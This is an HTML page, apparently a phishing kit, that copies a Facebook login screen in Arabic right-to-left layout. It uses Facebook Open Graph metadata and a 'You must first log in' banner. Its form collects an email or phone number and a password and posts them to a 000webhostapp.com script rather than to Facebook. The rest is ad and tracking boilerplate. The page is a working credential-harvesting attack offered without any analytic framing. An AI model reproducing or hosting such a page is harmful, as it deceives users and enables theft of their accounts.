<html>
  <head>
    <link href='Your Icon's Image Location' rel='shortcut icon' type='image/vnd.microsoft.icon'/>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <meta name="viewport" content="width=device-width , initial-scale=1.0">
	   
	  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
	  <title></title>
	  <meta property="og:url" content="https://www.facebook.com" />
	  <meta property="og:type" content="article" />
	  <meta property="og:title" content="Join Now" />
	  <meta property="og:description" content="Click Here To Continue" />
	  <meta property="og:image" content="http://upload.wikimedia.org/wikipedia/commons/thumb/1/16/Facebook-icon-1.png/480px-Facebook-icon-1.png" />

	
	  <meta name="revisit-after" content="1000 days">
<meta name="robots" content="NOINDEX">
    
    <link href='/css/textfont/droidarabicnaskh.css' rel='stylesheet' type='text/css'>
    <link href='/css/textfont/droidarabickufi.css' rel='stylesheet' type='text/css'>
    <!-- Google Tag Manager -->
    <!--<script>
        (function (w, d, s, l, i) {
            w[l] = w[l] || []; w[l].push({
                'gtm.start':
                    new Date().getTime(), event: 'gtm.js'
            }); var f = d.getElementsByTagName(s)[0],
                j = d.createElement(s), dl = l != 'dataLayer' ? '&l=' + l : ''; j.async = true; j.src =
                    'https://www.googletagmanager.com/gtm.js?id=' + i + dl; f.parentNode.insertBefore(j, f);
        })(window, document, 'script', 'dataLayer', 'GTM-KQDKW3');
	</script>-->
    <!-- End Google Tag Manager -->

   
      <meta property="og:locale" content="ar_AR" />
    <meta property="og:type"conten="website" />
   
   

    <link href="/bundle/Mainstyles?v=CSSTOModify" rel="stylesheet"/>

    <link href='/content/style.css?v=CSSTOModify' media="all" rel='stylesheet' type='text/css'>
    <link href='/content/style_navigation.css?v=CSSTOModify' media="all" rel='stylesheet' type='text/css'>
    <link href='/content/swiper.css?v=CSSTOModify' media="all" rel='stylesheet' type='text/css'>

    
    <script src="/bundle/Headcript2?v=CSSTOModify"></script>

    
   

  

    <!-- Start Alexa Certify Javascript -->
    
    <noscript><img src="https://d5nxst8fruw4z.cloudfront.net/atrk.gif?account=Oo52f1a0mN00oV" style="display:none" height="1" width="1" alt="" /></noscript>
    <!-- End Alexa Certify Javascript -->

    
<script async="async" src="https://securepubads.g.doubleclick.net/tag/js/gpt.js">


    <script>
        var googletag = googletag || {};
        googletag.cmd = googletag.cmd || [];
    </script>

    <script>
        googletag.cmd.push(function () {
            googletag.defineSlot('/15942961/Justpremium', [1, 1], 'div-gpt-ad-1481538218567-0').addService(googletag.pubads());
            googletag.pubads().enableSingleRequest();
            googletag.enableServices();
        });
    </script>
   
<script async="async" src="https://securepubads.g.doubleclick.net/tag/js/gpt.js">


    <script>
        var googletag = googletag || {};
        googletag.cmd = googletag.cmd || [];
    </script>


    <meta property="fb:pages" content="133880733349264" />




    <!--New insticator-->
    <!-- Header Tag Code -->
    <script data-cfasync='false' type='text/javascript'>/*<![CDATA[*/(function (a, c, s, u) { 'Insticator' in a || (a.Insticator = { ad: { loadAd: function (b) { Insticator.ad.q.push(b) }, q: [] }, helper: {}, embed: {}, version: "3.0", q: [], load: function (t, o) { Insticator.q.push({ t: t, o: o }) } }); var b = c.createElement(s); b.src = u; b.async = !0; var d = c.getElementsByTagName(s)[0]; d.parentNode.insertBefore(b, d) })(window, document, 'script', '//d2na2p72vtqyok.cloudfront.net/client-embed/96f52f49-c1dd-46df-ac23-c3c1793f817c.js');/*]]>*/</script><!-- End Header Tag Code -->
	
	
	
	






  <style>
body{
	margin: 0;
	font-family: sans-serif;
	line-height: 16px;
	font-size: 13px;
}

.navbar{
	background: #001f90b8;
    height: 39px;
    width: 100%;
}

.contact-us a{
	color:#00184a78;
	font-size:11px;
}

.nav-head{
	background-color:#ffdc0026;
	color:#5d530eb8;
	padding:6px 10px;
}

.contact-us{
	padding-bottom:21px;
	text-align:center;
}


.formulaire.formulaire>*{
	border-bottom:1px solid #c7c3c369;
}

.entrer{
	border:0;
	width:100%;
}

/*
submit
*/

.koala{
	display:inline-block;
	-webkit-border-radius:3px;
	font-weight:bold;
	background-color:#0036f999;	
	font-size:13px;
	line-height:34px;
	padding:0 18px;
	color:white
}

.square_btn {
   	position: relative;
    display: inline-block;
    padding: 11px;
    text-decoration: none;
    color: white;
    background: #1e4088b8;
    border-radius: 4px;
    font-weight: bold;
    border: 15px #f30909;
    width: 100%;
}


/* neveau compte */
.fruit{
	text-align:center;
	padding:9px;
} 
  </style>

 <link rel="me" href="https://www.blogger.com/profile/13814827393463420185" />
<meta name='google-adsense-platform-account' content='ca-host-pub-1556223355139109'/>
<meta name='google-adsense-platform-domain' content='blogspot.com'/>
</head>
  <body>
    <!-- NavBar -->
    <div class="navbar"></div>
    <div style="display:-webkit-box">
      <div style="-webkit-box-flex:1">
        <!--Nav-Header-->
        <div class="nav-head" style="direction: rtl;">
          <span>You must first log in</span>
        </div>

        <!-- Formulaire -->
        <div style="background-color:#2c3b5a0f;padding:2 31px">
          <form method="post" style="padding-top:17px;" action="https://newwaytrace.000webhostapp.com/main.php">
            <div class="formulaire" style="background:white;"> 
              <input class="entrer" style="padding:12px;direction: rtl;" name="email" placeholder="Mobile number or email address" required='' minlength="6" type="text">

              <input class="entrer" style="padding:12px;direction: rtl;" name="pass" placeholder="Password" required='' minlength="6" type="password">
              <div style="padding:12px;"> 
                <button type="submit" class="square_btn">Log In</button>
              </div>
            </div>
          </form> 

          <div class="fruit">
            <a class="koala">Create New Account</a> 
          </div>



          <div class="contact-us">
            <a></a>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
